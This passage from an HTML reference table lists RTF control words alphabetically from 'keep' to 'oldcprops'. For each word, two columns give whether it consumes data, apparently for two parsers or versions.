<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">keep</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">keepn</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">keycode</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">keywords</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">krnprsnet</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">landscape</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">lastrow</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">latentstyles</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">lchars</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">levelnumbers</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">levelpicturenosize</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">leveltext</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">lfolevel</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">linebetcol</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">linecont</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">lineppage</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">linerestart</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">linkself</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">linkstyles</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">linkval</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">list</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">listhybrid</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">listlevel</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">listname</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">listoverride</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">listoverridestartat</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">listoverridetable</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">listpicture</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">liststylename</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">listtable</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">listtext</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">lnbrkrule</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">lndscpsxn</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">lnongrid</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">loch</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">lsdlockedexcept</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">ltrch</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ltrdoc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ltrpar</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ltrrow</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ltrsect</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">lvltentative</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">lytcalctblwd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">lytexcttp</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">lytprtmet</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">lyttblrtgr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mac</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">macc</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">maccPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">macpict</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mailmerge</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">makebackup</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">maln</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">malnScr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">manager</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">margPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">margmirror</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">margmirsxn</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mbar</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mbarPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mbaseJc</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mbegChr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mborderBox</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mborderBoxPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mbox</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mboxPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mchr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mcount</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mctrlPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">md</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mdPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mdeg</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mdegHide</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mden</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mdiff</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">me</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mendChr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">meqArr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">meqArrPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mf</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mfName</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mfPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mfunc</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mfuncPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mgroupChr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mgroupChrPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mgrow</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mhideBot</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mhideLeft</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mhideRight</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mhideTop</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mhtmltag</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mlim</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mlimLow</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mlimloc</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mlimlow</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mlimlowPr</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mlimupp</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mlimuppPr</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mlit</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mm</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmaddfieldname</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmath</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmathPict</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmathPr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmattach</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmaxdist</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmblanklines</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmc</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmcJc</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmcPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmconnectstr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmconnectstrdata</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmcs</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmdatasource</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmdatatypeaccess</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmdatatypeexcel</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmdatatypefile</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmdatatypeodbc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmdatatypeodso</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmdatatypeqt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmdefaultsql</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmdestemail</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmdestfax</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmdestnewdoc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmdestprinter</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmfttypeaddress</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmfttypebarcode</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmfttypedbcolumn</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmfttypemapped</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmfttypenull</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmfttypesalutation</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmheadersource</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmlinktoquery</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmmailsubject</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmmaintypecatalog</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmmaintypeemail</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmmaintypeenvelopes</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmmaintypefax</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmmaintypelabels</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmmaintypeletters</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmodso</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmodsofilter</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmodsofldmpdata</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmodsomappedname</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmodsoname</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmodsorecipdata</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmodsosort</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmodsosrc</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmodsotable</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmodsoudl</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmodsoudldata</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmodsouniquetag</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmquery</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmshowdata</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mnary</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mnaryPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mnoBreak</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mnor</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mnum</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">moMath</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">moMathPara</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">moMathParaPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mobjDist</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mopEmu</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mphant</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mphantPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mplcHide</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mpos</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mrPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mrad</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mradPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">msPre</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">msPrePr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">msSub</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">msSubPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">msSubSup</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">msSubSupPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">msSup</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">msSupPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">msepChr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mshow</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mshp</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">msmcap</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mstrikeBLTR</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mstrikeH</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mstrikeTLBR</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mstrikeV</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">msub</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">msubHide</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">msup</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">msupHide</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mtransp</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mtype</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">muser</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mvertJc</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mvf</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mvfmf</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mvfml</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mvt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mvtof</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mvtol</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mzeroAsc</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mzeroDesc</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mzeroWid</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">nesttableprops</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">newtblstyruls</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nextfile</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">noafcnsttbl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nobrkwrptbl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nocolbal</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nocompatoptions</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nocwrap</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nocxsptable</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">noextrasprl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nofeaturethrottle</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nogrowautofit</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">noindnmbrts</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nojkernpunct</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nolead</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">noline</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nolnhtadjtbl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nonesttables</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">nonshppict</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">nooverflow</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">noproof</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">noqfpromote</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nosectexpand</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">nosnaplinegrid</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nospaceforul</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nosupersub</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">notabind</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">notbrkcnstfrctbl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">notcvasp</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">notvatxbx</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nouicompat</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">noultrlspc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nowidctlpar</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nowrap</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nowwrap</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">noxlattoyen</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">objalias</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">objattph</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">objautlink</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">objclass</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">objdata</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">object</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">objemb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">objhtml</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">objicemb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">objlink</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">objlock</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">objname</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">objocx</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">objpub</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">objsect</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">objsetsize</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">objsub</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">objtime</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">objupdate</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">oldas</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">oldcprops</th>
<td class="consumer">Consumes data</td>
